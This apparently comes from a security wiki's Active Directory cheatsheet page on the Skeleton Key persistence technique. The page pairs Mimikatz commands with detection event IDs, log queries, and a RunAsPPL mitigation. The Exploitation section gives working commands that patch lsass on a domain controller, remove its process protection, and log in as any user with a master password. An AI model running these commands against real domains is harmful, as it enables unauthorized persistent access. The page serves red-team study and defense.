📄
Bufu-Sec Wiki
GithubTwitter
  • Bufu-Sec Wiki
  • Active Directory
    • General
      • General
      • Installation
      • DNS
      • Kerberos
      • Kerberos Delegation
    • Enumeration
      • AD Module
      • Bloodhound
      • PowerShell Cheatsheet
      • PowerView Cheatsheet
      • Users
      • Groups
      • Computers
      • OUs
      • GPOs
      • ACLs
      • Domains
      • Trusts
      • Forest Mappings
      • Files and Shares
      • Kerbrute
    • Privilege Escalation
      • Kerberoasting
      • AS-REP Roasting
      • Constrained Delegation
      • Unconstrained Delegation
      • DNS Admins
    • Lateral Movement
      • PS Remoting
      • Credential Dumping
      • DC Sync
      • Overpass the Hash
      • Ticket Harvesting
      • Pass the Ticket
    • Persistence
      • Golden Tickets
      • Silver Tickets
      • ACL Attacks
      • Custom SSPs
      • DC Shadow
      • Skeleton Key
      • DSRM
    • Trust Attacks
      • Cross Domain Attacks
      • Cross Forest Attacks
      • MSSQL Servers
    • MITM & Relay Attacks
      • LLMNR Poisoning
      • SMB Relay
      • IPv6 Attacks
    • Detection & Defense
      • Domain Admins
      • Architectural Changes
      • Microsoft ATA
Powered by GitBook
On this page
  • General
  • Exploitation
  • Detection
  • Mitigation
  1. Active Directory
  2. Persistence

Skeleton Key

General

  • Patch a Domain Controller (lsass process) so that it allows access as any user with a single password

  • Discovered in malware named Skeleton Key malware

  • All publicly known methods are NOT persistent accross reboots

  • Mimikatz to the rescue

Exploitation

# Inject skeleton key on DC of choice with default password of 'mimikatz'. DA privs required
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

# If lsass is running as procted process we can still use Skeleton Key but it needs the mimikatz driver (mimidriv.sys) on disk of target DC. Very noisy!
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

# Access machine with valid username
Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\administrator

Detection

  • Events:

    • 7045: A service was installed in the system (Type: Kernel Mode Driver)

    • 4624: Account Logon

    • 4634: Account Logoff

    • 4672: Admin Logon

  • Events("Audit Privilege Use" must be enabled)

    • 4673: Sensitive Privilege Use

    • 4611: A trusted logon process has been registered with the Local Security Authority

Get-WinEvent -FilterHashtable @{Logname='Security';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*"}

# Not recommended (detects only stock mimidriv)
Get-WinEvent -FilterHashtable @{Logname='Security';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*" -and $_.message -like "*mimidrv*"}

Mitigation

  • Run lsass.exe as a protected process, as it forces an attacker to load a kernel mode driver -> log detection

  • Test before implementing, as many drivers and plguins may not load with the protection

New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name RunAsPPL -Value 1 -Verbose

# Verify after reboot
Get-WinEvent -FilterHashtable @{Logname='Security';ID=12} | ?{$_.message -like "*protected process*"}
PreviousDC ShadowNextDSRM

Last updated 2 years ago